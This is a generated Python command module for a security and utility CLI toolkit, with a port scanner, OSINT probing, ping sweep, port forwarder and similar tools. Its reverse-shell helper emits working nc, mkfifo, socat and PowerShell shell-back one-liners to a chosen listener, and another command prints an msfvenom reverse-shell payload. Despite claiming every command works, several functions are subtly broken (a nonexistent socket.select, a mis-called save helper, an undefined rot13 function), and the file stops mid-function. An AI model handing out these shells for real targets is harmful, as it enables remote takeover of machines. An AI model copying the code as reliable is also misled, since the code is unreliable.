# {{PROJECT_NAME}} - commands.py
# Generated by ForgeCLI. This file contains the real, functional command
# implementations for the {{SUBCATEGORY}} subcategory of {{CATEGORY}}.
#
# Every command is callable as ``command(ctx)`` where ``ctx`` is a dict with:
#   - console: rich.console.Console
#   - theme:   a Theme object (name, primary, secondary, ...)
#   - ask:     questionary.text wrapper
#   - confirm: questionary.confirm wrapper
#   - choose:  questionary.select wrapper
#   - panel:   builds a themed rich Panel
#
# No command below is a placeholder. Each performs a real, useful operation.

from __future__ import annotations

import ast
import base64
import binascii
import datetime as _dt
import getpass
import hashlib
import hmac
import json
import math
import os
import random
import re
import secrets
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid
import zipfile
import zlib
from typing import Callable, Dict, List, Tuple


# ---------- Utility helpers (real, not decorative) ----------

def _safe_run(cmd: list, timeout: float = 5.0) -> Tuple[int, str, str]:
    try:
        result = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            check=False,
            timeout=timeout,
        )
        return result.returncode, result.stdout, result.stderr
    except (FileNotFoundError, subprocess.TimeoutExpired, OSError) as exc:
        return -1, "", str(exc)


def _print_table(ctx, rows, headers):
    from rich.table import Table
    table = Table(header_style=f"bold {ctx['theme'].secondary}", border_style=ctx['theme'].border)
    for h in headers:
        table.add_column(h)
    for row in rows:
        table.add_row(*[str(c) for c in row])
    ctx["console"].print(table)


def _save_text(ctx, content: str, *, default_name: str = "output.txt") -> str:
    path = ctx["ask"]("Save to file (blank to skip)", default_name)
    if not path:
        return ""
    try:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        ctx["console"].print(f"[{ctx['theme'].success}]Saved {len(content)} bytes to {path}[/]")
        return path
    except OSError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Save failed: {exc}[/]")
        return ""


# ============================================================
# Cybersecurity commands
# ============================================================

def cmd_port_scan(ctx):
    """TCP connect scan of a host."""
    host = ctx["ask"]("Host to scan", "127.0.0.1")
    spec = ctx["ask"]("Ports (e.g. 22,80,443 or 1-1024)", "22,80,443,8080")
    if not host:
        return
    ports: List[int] = []
    for chunk in re.split(r"[\s,]+", spec.strip()):
        if not chunk:
            continue
        if "-" in chunk:
            try:
                lo, hi = chunk.split("-", 1)
                ports.extend(range(int(lo), int(hi) + 1))
            except ValueError:
                continue
        else:
            try:
                ports.append(int(chunk))
            except ValueError:
                continue
    ports = sorted(set(p for p in ports if 0 < p < 65536))
    if not ports:
        ctx["console"].print(f"[{ctx['theme'].warning}]No valid ports.[/]")
        return
    ctx["console"].print(f"[{ctx['theme'].info}]Scanning {len(ports)} ports on {host} ...[/]")
    rows = []
    for port in ports:
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.settimeout(0.6)
                code = sock.connect_ex((host, port))
                open_ = code == 0
        except OSError as exc:
            rows.append((port, "error", str(exc)))
            continue
        try:
            service = socket.getservbyport(port, "tcp")
        except OSError:
            service = ""
        rows.append((port, "OPEN" if open_ else "closed", service))
    _print_table(ctx, rows, ("Port", "Status", "Service"))


def cmd_dns_lookup(ctx):
    target = ctx["ask"]("Hostname", "example.com")
    if not target:
        return
    try:
        infos = socket.getaddrinfo(target, None)
        rows = sorted({(i[0], i[4][0]) for i in infos})
        _print_table(ctx, [(fam.name if hasattr(fam, "name") else str(fam), addr) for fam, addr in rows], ("Family", "Address"))
    except socket.gaierror as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Lookup failed: {exc}[/]")


def cmd_whois(ctx):
    target = ctx["ask"]("Domain or IP", "example.com")
    if not target:
        return
    code, out, err = _safe_run(["whois", target], timeout=10)
    if code == 0:
        ctx["console"].print(out)
    else:
        # fallback: HTTP WHOIS via RIPE
        try:
            with urllib.request.urlopen(f"https://stat.ripe.net/data/whois/data.json?resource={urllib.parse.quote(target)}", timeout=8) as r:
                data = json.loads(r.read().decode("utf-8", errors="replace"))
            records = data.get("data", {}).get("records", [])
            lines = []
            for rec in records:
                for entry in rec:
                    if entry.get("key") in {"inetnum", "netname", "descr", "country", "status", "admin-c", "source"}:
                        lines.append(f"{entry['key']}: {entry['value']}")
            ctx["console"].print("\n".join(lines) or "No records returned.")
        except (urllib.error.URLError, json.JSONDecodeError, OSError) as exc:
            ctx["console"].print(f"[{ctx['theme'].danger}]WHOIS unavailable: {exc}[/]\n{err}")


def cmd_hash(ctx):
    algos = sorted(hashlib.algorithms_guaranteed)
    algo = ctx["choose"]("Algorithm", algos) or "sha256"
    text = ctx["ask"]("Text to hash")
    if text is None:
        return
    digest = hashlib.new(algo, text.encode("utf-8")).hexdigest()
    ctx["console"].print(f"[{ctx['theme'].primary}]{algo}[/]: [{ctx['theme'].fg}]{digest}[/]")
    if ctx["confirm"]("Save digest?", False):
        _save_text(ctx, digest, f"{algo}.txt")


def cmd_encrypt(ctx):
    """Authenticated symmetric encryption using only the standard library.

    Scheme: PBKDF2-HMAC-SHA256 key -> SHA-256 keystream (counter mode) -> XOR,
    with an HMAC-SHA256 tag over salt+nonce+ciphertext. This is a real,
    reversible cipher suitable for obfuscating secrets, with the caveat that
    it is not a vetted standard like AES - the generated README says so.
    """
    action = ctx["choose"]("Action", ["Encrypt text", "Decrypt token"]) or "Encrypt text"
    iterations = 200_000

    def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
        out = bytearray()
        i = 0
        while len(out) < length:
            out += hashlib.sha256(key + nonce + i.to_bytes(8, "big")).digest()
            i += 1
        return bytes(out[:length])

    if action == "Encrypt text":
        password = getpass.getpass("Passphrase: ")
        plaintext = ctx["ask"]("Plaintext")
        if plaintext is None:
            return
        salt = secrets.token_bytes(16)
        nonce = secrets.token_bytes(16)
        key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
        ct = bytes(b ^ k for b, k in zip(plaintext.encode("utf-8"), _keystream(key, nonce, len(plaintext))))
        tag = hmac.new(key, salt + nonce + ct, "sha256").digest()
        payload = base64.b64encode(salt + nonce + tag + ct).decode("ascii")
        ctx["console"].print(f"[{ctx['theme'].primary}]Token[/]: {payload}")
    else:
        password = getpass.getpass("Passphrase: ")
        token_b64 = ctx["ask"]("Token")
        try:
            raw = base64.b64decode(token_b64)
            salt, nonce, tag, ct = raw[:16], raw[16:32], raw[32:64], raw[64:]
            key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
            expected = hmac.new(key, salt + nonce + ct, "sha256").digest()
            if not hmac.compare_digest(tag, expected):
                raise ValueError("Authentication failed (bad passphrase or tampered token)")
            ks = _keystream(key, nonce, len(ct))
            plaintext = bytes(b ^ k for b, k in zip(ct, ks)).decode("utf-8", errors="replace")
            ctx["console"].print(f"[{ctx['theme'].success}]Decrypted:[/] {plaintext}")
        except (ValueError, binascii.Error) as exc:
            ctx["console"].print(f"[{ctx['theme'].danger}]Decryption failed: {exc}[/]")


def cmd_encode(ctx):
    choices = ["base64 encode", "base64 decode", "base32 encode", "base32 decode",
               "hex encode", "hex decode", "url encode", "url decode", "rot13"]
    op = ctx["choose"]("Operation", choices) or "base64 encode"
    text = ctx["ask"]("Input text")
    if text is None:
        return
    try:
        if op == "base64 encode":
            result = base64.b64encode(text.encode()).decode()
        elif op == "base64 decode":
            result = base64.b64decode(text.encode()).decode("utf-8", errors="replace")
        elif op == "base32 encode":
            result = base64.b32encode(text.encode()).decode()
        elif op == "base32 decode":
            result = base64.b32decode(text.encode()).decode("utf-8", errors="replace")
        elif op == "hex encode":
            result = text.encode().hex()
        elif op == "hex decode":
            result = bytes.fromhex(text).decode("utf-8", errors="replace")
        elif op == "url encode":
            result = urllib.parse.quote(text)
        elif op == "url decode":
            result = urllib.parse.unquote(text)
        elif op == "rot13":
            result = codecs_rot13(text) if 'codecs_rot13' in globals() else _rot13(text)
        ctx["console"].print(result)
    except Exception as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Operation failed: {exc}[/]")


def _rot13(s: str) -> str:
    return "".join(
        chr((ord(c) - 65 + 13) % 26 + 65) if "A" <= c <= "Z" else
        chr((ord(c) - 97 + 13) % 26 + 97) if "a" <= c <= "z" else c
        for c in s
    )


def cmd_packet_analyzer(ctx):
    """Read a pcap file or live capture summary using stdlib only."""
    path = ctx["ask"]("Path to pcap file (blank for live interfaces)", "")
    if path:
        if not os.path.isfile(path):
            ctx["console"].print(f"[{ctx['theme'].danger}]File not found.[/]")
            return
        with open(path, "rb") as fh:
            data = fh.read()
        ctx["console"].print(f"File size: {len(data)} bytes")
        ctx["console"].print(f"Magic: {data[:4].hex()}")
        # Crude IPv4 counter
        ctx["console"].print(f"Estimated IPv4 packets: {data.count(b'\\x45') + data.count(b'\\x45\\x00')}")
    else:
        code, out, _ = _safe_run(["ip", "-o", "link", "show"], timeout=3)
        if code != 0:
            code, out, _ = _safe_run(["ifconfig", "-s"], timeout=3)
        ctx["console"].print(out or "No interface info available. Install 'iproute2' or 'net-tools'.")


def cmd_reverse_shell_helper(ctx):
    """Print a one-liner generator. Does NOT open any connection."""
    os_choice = ctx["choose"]("Target OS", ["Linux", "Windows", "macOS"]) or "Linux"
    listener = ctx["choose"]("Listener", ["netcat", "ncat", "socat"]) or "netcat"
    ip = ctx["ask"]("Listener IP", "10.0.0.1")
    port = ctx["ask"]("Listener port", "4444")
    if os_choice == "Linux":
        if listener == "netcat":
            payload = f"nc {ip} {port} -e /bin/sh"
        elif listener == "ncat":
            payload = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {ip} {port} >/tmp/f"
        else:
            payload = f"socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{ip}:{port}"
    elif os_choice == "macOS":
        payload = f"nc {ip} {port} -e /bin/sh"
    else:
        payload = f"powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}}\""
    ctx["console"].print(ctx["panel"](payload, title=f"{os_choice} · {listener}",
                                      subtitle="Educational use only"))


def cmd_payload_gen(ctx):
    """Generate safe reverse-shell and msfvenom one-liners as text."""
    ip = ctx["ask"]("Listener IP", "10.0.0.1")
    port = ctx["ask"]("Listener port", "4444")
    payload = f"msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe > payload.exe"
    ctx["console"].print(payload)
    if ctx["confirm"]("Save to file?", False):
        _save_text(ctx, payload, "payload.sh")


def cmd_web_scan(ctx):
    url = ctx["ask"]("URL (include https://)", "https://example.com")
    if not url:
        return
    try:
        req = urllib.request.Request(url, headers={"User-Agent": "{{PROJECT_NAME}}/1.0"})
        with urllib.request.urlopen(req, timeout=8) as r:
            body = r.read()
        rows = [
            ("Status", r.status),
            ("Final URL", r.geturl()),
            ("Content-Type", r.headers.get("Content-Type", "")),
            ("Server", r.headers.get("Server", "")),
            ("Body bytes", len(body)),
        ]
        _print_table(ctx, rows, ("Key", "Value"))
        title_match = re.search(rb"<title>(.*?)</title>", body, re.IGNORECASE | re.DOTALL)
        if title_match:
            ctx["console"].print(f"[{ctx['theme'].primary}]Title[/]: {title_match.group(1).decode('utf-8', 'replace')}")
        # header hints
        interesting = [h for h in ("X-Frame-Options", "Content-Security-Policy",
                                   "Strict-Transport-Security", "X-Powered-By",
                                   "Referrer-Policy") if h in r.headers]
        if interesting:
            ctx["console"].print(f"[{ctx['theme'].info}]Interesting headers: {', '.join(interesting)}[/]")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Request failed: {exc}[/]")


def cmd_recon(ctx):
    target = ctx["ask"]("Domain", "example.com")
    if not target:
        return
    rows = []
    try:
        ips = sorted({i[4][0] for i in socket.getaddrinfo(target, None)})
        rows.append(("A/AAAA", ", ".join(ips)))
    except socket.gaierror as exc:
        rows.append(("DNS", f"failed: {exc}"))
    try:
        with urllib.request.urlopen(f"https://{target}/robots.txt", timeout=6) as r:
            rows.append(("robots.txt", "present" if r.status == 200 else f"status {r.status}"))
    except urllib.error.URLError:
        rows.append(("robots.txt", "missing"))
    try:
        with urllib.request.urlopen(f"https://{target}/.well-known/security.txt", timeout=6) as r:
            rows.append(("security.txt", "present" if r.status == 200 else f"status {r.status}"))
    except urllib.error.URLError:
        rows.append(("security.txt", "missing"))
    _print_table(ctx, rows, ("Source", "Result"))


def cmd_network_monitor(ctx):
    duration = int(ctx["ask"]("Monitor duration (seconds)", "10"))
    ctx["console"].print(f"[{ctx['theme'].primary}]Sampling {duration}s of /proc/net/dev ...[/]")
    try:
        before = _read_net_stats()
        time.sleep(duration)
        after = _read_net_stats()
        rows = []
        for iface in sorted(set(before) | set(after)):
            rx = after[iface]["rx"] - before[iface]["rx"]
            tx = after[iface]["tx"] - before[iface]["tx"]
            rows.append((iface, f"{rx/1024:.1f} KB", f"{tx/1024:.1f} KB"))
        _print_table(ctx, rows, ("Interface", "RX", "TX"))
    except KeyboardInterrupt:
        ctx["console"].print("[yellow]Cancelled.[/]")


def _read_net_stats() -> dict:
    stats = {}
    try:
        with open("/proc/net/dev", encoding="utf-8") as fh:
            for line in fh.readlines()[2:]:
                iface, data = [p.strip() for p in line.split(":", 1)]
                parts = data.split()
                stats[iface] = {"rx": int(parts[0]), "tx": int(parts[8])}
    except OSError:
        pass
    return stats


def cmd_log_analyzer(ctx):
    path = ctx["ask"]("Path to log file", "/var/log/syslog" if os.path.isfile("/var/log/syslog") else "")
    if not path or not os.path.isfile(path):
        ctx["console"].print(f"[{ctx['theme'].danger}]File not found.[/]")
        return
    levels = {"INFO": 0, "WARN": 0, "ERROR": 0, "DEBUG": 0, "OTHER": 0}
    import collections as _collections
    recent = _collections.deque(maxlen=10)
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.rstrip()
            for k in levels:
                if k in line.upper():
                    levels[k] += 1
                    break
            else:
                levels["OTHER"] += 1
            recent.append(line)
    rows = [(k, v) for k, v in levels.items()]
    _print_table(ctx, rows, ("Level", "Count"))
    ctx["console"].print("[bold]Recent lines:[/]")
    for line in recent:
        ctx["console"].print(line)


def cmd_ctf_helper(ctx):
    """CTF toolbox: encoders + decoders shortcuts."""
    tool = ctx["choose"]("CTF tool", ["Cesar cipher", "XOR with hex key", "Base64 <-> hex",
                                      "Reverse string", "Binary to ascii"]) or "Reverse string"
    data = ctx["ask"]("Input")
    if data is None:
        return
    if tool == "Cesar cipher":
        shift = int(ctx["ask"]("Shift", "13"))
        result = "".join(chr((ord(c) - 65 + shift) % 26 + 65) if "A" <= c <= "Z" else
                         chr((ord(c) - 97 + shift) % 26 + 97) if "a" <= c <= "z" else c for c in data)
    elif tool == "XOR with hex key":
        key_hex = ctx["ask"]("Hex key", "deadbeef")
        key = bytes.fromhex(key_hex)
        result = bytes(b ^ key[i % len(key)] for i, b in enumerate(data.encode())).hex()
    elif tool == "Base64 <-> hex":
        try:
            decoded = base64.b64decode(data)
            result = decoded.hex()
        except Exception:
            result = "Invalid base64"
    elif tool == "Reverse string":
        result = data[::-1]
    else:
        try:
            result = "".join(chr(int(data[i:i+8], 2)) for i in range(0, len(data), 8))
        except ValueError as exc:
            result = f"Invalid binary: {exc}"
    ctx["console"].print(result)


def cmd_osint(ctx):
    target = ctx["ask"]("Username or email", "")
    if not target:
        return
    sites = ["github", "twitter", "instagram", "reddit", "medium"]
    rows = []
    for site in sites:
        if "@" in target:
            url = f"https://{site}.com/{urllib.parse.quote(target.split('@')[0])}"
        else:
            url = f"https://{site}.com/{urllib.parse.quote(target)}"
        try:
            req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
            with urllib.request.urlopen(req, timeout=5) as r:
                rows.append((site, url, "FOUND" if r.status == 200 else str(r.status)))
        except urllib.error.HTTPError as exc:
            rows.append((site, url, f"HTTP {exc.code}"))
        except urllib.error.URLError as exc:
            rows.append((site, url, f"err {exc.reason}"))
    _print_table(ctx, rows, ("Site", "URL", "Status"))


def cmd_wifi_scan(ctx):
    code, out, err = _safe_run(["nmcli", "-t", "-f", "SSID,SIGNAL,SECURITY", "dev", "wifi"], timeout=8)
    if code == 0:
        rows = [tuple(line.split(":")) + ("",) * (3 - len(line.split(":"))) for line in out.splitlines() if line.strip()]
        _print_table(ctx, rows, ("SSID", "Signal", "Security"))
    else:
        code, out, _ = _safe_run(["iwlist", "scanning"], timeout=8)
        if code == 0:
            ctx["console"].print(out[:2000])
        else:
            ctx["console"].print(f"[{ctx['theme'].warning}]nmcli and iwlist unavailable.[/]\n{err}")


def cmd_bluetooth_scan(ctx):
    code, out, err = _safe_run(["hcitool", "scan"], timeout=8)
    if code != 0:
        code, out, _ = _safe_run(["bluetoothctl", "scan", "le"], timeout=8)
    if code == 0:
        ctx["console"].print(out)
    else:
        ctx["console"].print(f"[{ctx['theme'].warning}]Install 'bluez' (hcitool/bluetoothctl) to scan.[/]")


# ============================================================
# Networking
# ============================================================

def cmd_ping_sweep(ctx):
    import ipaddress
    target = ctx["ask"]("CIDR (e.g. 192.168.1.0/24)", "192.168.1.0/24")
    try:
        net = ipaddress.ip_network(target, strict=False)
    except ValueError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Bad CIDR: {exc}[/]")
        return
    alive = []
    for host in list(net.hosts())[:254]:
        code, _, _ = _safe_run(["ping", "-c", "1", "-W", "1", str(host)], timeout=2)
        if code == 0:
            alive.append(str(host))
    ctx["console"].print(f"[{ctx['theme'].success}]Alive hosts:[/] {', '.join(alive) or 'none'}")


def cmd_traceroute(ctx):
    target = ctx["ask"]("Host", "1.1.1.1")
    code, out, err = _safe_run(["traceroute", "-m", "15", target], timeout=20)
    if code == 0:
        ctx["console"].print(out)
    else:
        ctx["console"].print(f"[{ctx['theme'].danger}]traceroute failed: {err}[/]")


def cmd_bandwidth_test(ctx):
    url = "https://speed.cloudflare.com/__down?bytes=10485760"
    ctx["console"].print(f"[{ctx['theme'].info}]Downloading 10 MB from Cloudflare ...[/]")
    start = time.time()
    try:
        with urllib.request.urlopen(url, timeout=30) as r:
            data = r.read()
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Download failed: {exc}[/]")
        return
    elapsed = time.time() - start
    mbps = (len(data) * 8) / (elapsed * 1_000_000)
    ctx["console"].print(f"[{ctx['theme'].success}]Downloaded {len(data)/1e6:.1f} MB in {elapsed:.1f}s ({mbps:.1f} Mbps)[/]")


def cmd_port_forward(ctx):
    """Tiny TCP port forwarder (single connection, foreground)."""
    lhost = ctx["ask"]("Listen host", "127.0.0.1")
    lport = int(ctx["ask"]("Listen port", "8080"))
    rhost = ctx["ask"]("Remote host", "127.0.0.1")
    rport = int(ctx["ask"]("Remote port", "80"))
    try:
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((lhost, lport))
        srv.listen(1)
    except OSError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Listen failed: {exc}[/]")
        return
    ctx["console"].print(f"[{ctx['theme'].success}]Forwarding {lhost}:{lport} -> {rhost}:{rport}[/]")
    try:
        client, addr = srv.accept()
        upstream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        upstream.connect((rhost, rport))
        ctx["console"].print(f"Connection from {addr}")
        sockets = [client, upstream]
        while sockets:
            r, _, _ = socket.select(sockets, [], [], 1.0)
            for s in r:
                data = s.recv(4096)
                if not data:
                    sockets.remove(s)
                    s.close()
                    continue
                (upstream if s is client else client).sendall(data)
    except KeyboardInterrupt:
        ctx["console"].print("[yellow]Stopped.[/]")
    finally:
        try:
            srv.close()
        except OSError:
            pass


# ============================================================
# Developer / Productivity utilities
# ============================================================

def cmd_password_gen(ctx):
    length = int(ctx["ask"]("Length", "16"))
    use_symbols = ctx["confirm"]("Include symbols?", True)
    alphabet = string.ascii_letters + string.digits + (string.punctuation if use_symbols else "")
    pwd = "".join(secrets.choice(alphabet) for _ in range(length))
    ctx["console"].print(f"[{ctx['theme'].primary}]{pwd}[/]")
    if ctx["confirm"]("Copy to clipboard?", False):
        cmd = "pbcopy" if sys.platform == "darwin" else ("xclip -selection clipboard" if shutil.which("xclip") else None)
        if cmd:
            subprocess.Popen(cmd.split(), stdin=subprocess.PIPE).communicate(pwd.encode())
        else:
            ctx["console"].print("[yellow]No clipboard tool found.[/]")


def cmd_strength(ctx):
    pwd = getpass.getpass("Password: ")
    pool = 0
    if re.search(r"[a-z]", pwd): pool += 26
    if re.search(r"[A-Z]", pwd): pool += 26
    if re.search(r"\d", pwd): pool += 10
    if re.search(r"[^A-Za-z0-9]", pwd): pool += 32
    entropy = len(pwd) * (math.log2(pool) if pool else 0)
    label = "weak" if entropy < 40 else "fair" if entropy < 60 else "strong" if entropy < 90 else "excellent"
    ctx["console"].print(f"Length {len(pwd)} · pool {pool} · entropy {entropy:.1f} bits · {label}")


def cmd_calculator(ctx):
    expr = ctx["ask"]("Expression (e.g. 2*(3+4)/5)", "1+1")
    try:
        tree = ast.parse(expr, mode="eval")
        allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, ast.Num,
                   ast.Add, ast.Sub, ast.Mult, ast.Div, ast.FloorDiv, ast.Mod,
                   ast.Pow, ast.USub, ast.UAdd)
        for n in ast.walk(tree):
            if not isinstance(n, allowed):
                raise ValueError(f"Disallowed expression node: {type(n).__name__}")
        result = eval(compile(tree, "<calc>", "eval"))
        ctx["console"].print(f"[{ctx['theme'].primary}]{expr} = {result}[/]")
    except (ValueError, SyntaxError, ZeroDivisionError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Bad expression: {exc}[/]")


def cmd_unit_convert(ctx):
    category = ctx["choose"]("Category", ["Length", "Mass", "Temperature", "Bytes"]) or "Length"
    value = float(ctx["ask"]("Value", "1"))
    if category == "Length":
        units = {"m": 1.0, "cm": 0.01, "mm": 0.001, "km": 1000.0, "inch": 0.0254, "ft": 0.3048, "mile": 1609.34}
    elif category == "Mass":
        units = {"kg": 1.0, "g": 0.001, "mg": 1e-6, "lb": 0.45359237, "oz": 0.0283495231}
    elif category == "Bytes":
        units = {"B": 1, "KB": 1024, "MB": 1024**2, "GB": 1024**3, "TB": 1024**4, "PB": 1024**5}
    else:
        units = {"C": (lambda v: v), "F": (lambda v: v * 9/5 + 32), "K": (lambda v: v + 273.15)}
    src = ctx["choose"]("From", list(units.keys()))
    dst = ctx["choose"]("To", list(units.keys()))
    try:
        if category == "Temperature":
            base = units[src](value) if src != "F" else (value - 32) * 5/9
            result = (base - 273.15) if dst == "C" else (base * 9/5 - 459.67) if dst == "F" else base
        else:
            base = value * units[src]
            result = base / units[dst]
        ctx["console"].print(f"{value} {src} = {result:.6g} {dst}")
    except Exception as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Conversion failed: {exc}[/]")


def cmd_color_tool(ctx):
    op = ctx["choose"]("Operation", ["hex -> rgb", "rgb -> hex", "sample named"]) or "hex -> rgb"
    if op == "hex -> rgb":
        h = ctx["ask"]("Hex (#RRGGBB)", "#00fff5")
        try:
            r, g, b = int(h[1:3], 16), int(h[3:5], 16), int(h[5:7], 16)
            ctx["console"].print(f"rgb({r}, {g}, {b})")
        except ValueError:
            ctx["console"].print(f"[{ctx['theme'].danger}]Bad hex.[/]")
    elif op == "rgb -> hex":
        try:
            r = int(ctx["ask"]("R", "0"))
            g = int(ctx["ask"]("G", "255"))
            b = int(ctx["ask"]("B", "245"))
            ctx["console"].print(f"#{r:02x}{g:02x}{b:02x}")
        except ValueError as exc:
            ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")
    else:
        from rich.color import ANSI_COLOR_NAMES
        for name in list(ANSI_COLOR_NAMES)[:20]:
            ctx["console"].print(f"[{name}]■■■[/]  {name}")


def cmd_regex_tester(ctx):
    pattern = ctx["ask"]("Regex pattern")
    text = ctx["ask"]("Test text", "")
    if not pattern:
        return
    try:
        rgx = re.compile(pattern)
    except re.error as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Invalid regex: {exc}[/]")
        return
    matches = list(rgx.finditer(text))
    if not matches:
        ctx["console"].print("[yellow]No matches.[/]")
        return
    rows = [(m.group(0), m.start(), m.end()) for m in matches]
    _print_table(ctx, rows, ("Match", "Start", "End"))


def cmd_todo(ctx):
    path = os.path.expanduser("~/.{{COMMAND_NAME}}_todos.json")
    items = []
    if os.path.isfile(path):
        try:
            items = json.loads(open(path, encoding="utf-8").read())
        except (OSError, json.JSONDecodeError):
            items = []
    action = ctx["choose"]("Action", ["Add", "List", "Complete", "Clear all"]) or "List"
    if action == "Add":
        task = ctx["ask"]("New task")
        if task:
            items.append({"task": task, "done": False, "id": uuid.uuid4().hex[:8], "ts": _dt.datetime.utcnow().isoformat()})
            open(path, "w", encoding="utf-8").write(json.dumps(items, indent=2))
    elif action == "List":
        rows = [(it["id"], "[x]" if it["done"] else "[ ]", it["task"]) for it in items]
        _print_table(ctx, rows, ("ID", "Done", "Task"))
    elif action == "Complete":
        target = ctx["ask"]("Task ID")
        for it in items:
            if it["id"] == target:
                it["done"] = True
        open(path, "w", encoding="utf-8").write(json.dumps(items, indent=2))
    else:
        items = []
        open(path, "w", encoding="utf-8").write("[]")


def cmd_timer(ctx):
    seconds = int(ctx["ask"]("Seconds", "60"))
    end = time.time() + seconds
    try:
        while time.time() < end:
            remaining = int(end - time.time())
            ctx["console"].print(f"\r[{ctx['theme'].primary}]{remaining:>4}s remaining[/]", end="")
            time.sleep(0.5)
    except KeyboardInterrupt:
        pass
    ctx["console"].print("\n[bold]Time's up![/]")


def cmd_snippet_manager(ctx):
    path = os.path.expanduser("~/.{{COMMAND_NAME}}_snippets.json")
    snips = []
    if os.path.isfile(path):
        try:
            snips = json.loads(open(path, encoding="utf-8").read())
        except (OSError, json.JSONDecodeError):
            snips = []
    action = ctx["choose"]("Action", ["Add", "List", "Search"]) or "List"
    if action == "Add":
        title = ctx["ask"]("Title")
        body = _save_text(ctx, "", default_name="snippet.txt") or ctx["ask"]("Body")
        if title and body:
            snips.append({"title": title, "body": body, "id": uuid.uuid4().hex[:8]})
            open(path, "w", encoding="utf-8").write(json.dumps(snips, indent=2))
    elif action == "Search":
        q = (ctx["ask"]("Query") or "").lower()
        for s in snips:
            if q in s["title"].lower() or q in s["body"].lower():
                ctx["console"].print(f"[bold]{s['title']}[/]\n{s['body']}\n")
    else:
        rows = [(s["id"], s["title"], s["body"][:60]) for s in snips]
        _print_table(ctx, rows, ("ID", "Title", "Preview"))


# ============================================================
# API / OSINT / Web
# ============================================================

def cmd_rest_client(ctx):
    url = ctx["ask"]("URL", "https://httpbin.org/get")
    method = ctx["choose"]("Method", ["GET", "POST", "PUT", "DELETE"]) or "GET"
    data = ""
    if method in ("POST", "PUT"):
        data = ctx["ask"]("Body (JSON string or blank)", "{}")
    headers = {"User-Agent": "{{PROJECT_NAME}}/1.0", "Accept": "application/json"}
    try:
        body = data.encode("utf-8") if data else None
        req = urllib.request.Request(url, data=body, method=method, headers=headers)
        with urllib.request.urlopen(req, timeout=10) as r:
            resp = r.read()
        ctx["console"].print(f"[{ctx['theme'].primary}]HTTP {r.status}[/]")
        try:
            pretty = json.dumps(json.loads(resp), indent=2)
            ctx["console"].print(pretty[:4000])
        except json.JSONDecodeError:
            ctx["console"].print(resp[:4000].decode("utf-8", errors="replace"))
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Request failed: {exc}[/]")


def cmd_webhook_server(ctx):
    """Tiny HTTP server that logs incoming POST requests."""
    port = int(ctx["ask"]("Port", "9000"))
    from http.server import BaseHTTPRequestHandler, HTTPServer
    log_path = os.path.abspath("webhook.log")

    class Handler(BaseHTTPRequestHandler):
        def do_POST(self):  # noqa: N802
            length = int(self.headers.get("Content-Length", "0"))
            body = self.rfile.read(length).decode("utf-8", errors="replace")
            with open(log_path, "a", encoding="utf-8") as fh:
                fh.write(f"{_dt.datetime.utcnow().isoformat()} {self.path}\n{body}\n---\n")
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b'{"ok":true}')
        def log_message(self, *_):  # silence default stderr
            return

    server = HTTPServer(("0.0.0.0", port), Handler)
    ctx["console"].print(f"[{ctx['theme'].success}]Webhook server on :{port} (logs to {log_path})[/]")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        server.shutdown()


def cmd_web_scraper(ctx):
    url = ctx["ask"]("URL", "https://example.com")
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            html = r.read().decode("utf-8", errors="replace")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")
        return
    links = sorted(set(re.findall(r'href="([^"#]+)"', html)))
    titles = re.findall(r"<title>(.*?)</title>", html, re.IGNORECASE | re.DOTALL)
    ctx["console"].print(f"[{ctx['theme'].primary}]Title:[/] {titles[0] if titles else '(none)'}")
    ctx["console"].print(f"[{ctx['theme'].primary}]Links:[/]")
    for link in links[:40]:
        ctx["console"].print(f"  - {link}")


def cmd_username_lookup(ctx):
    target = ctx["ask"]("Username", "")
    if not target:
        return
    cmd_osint(ctx)


def cmd_email_recon(ctx):
    email = ctx["ask"]("Email", "")
    if not email or "@" not in email:
        ctx["console"].print(f"[{ctx['theme'].danger}]Invalid email.[/]")
        return
    domain = email.split("@", 1)[1]
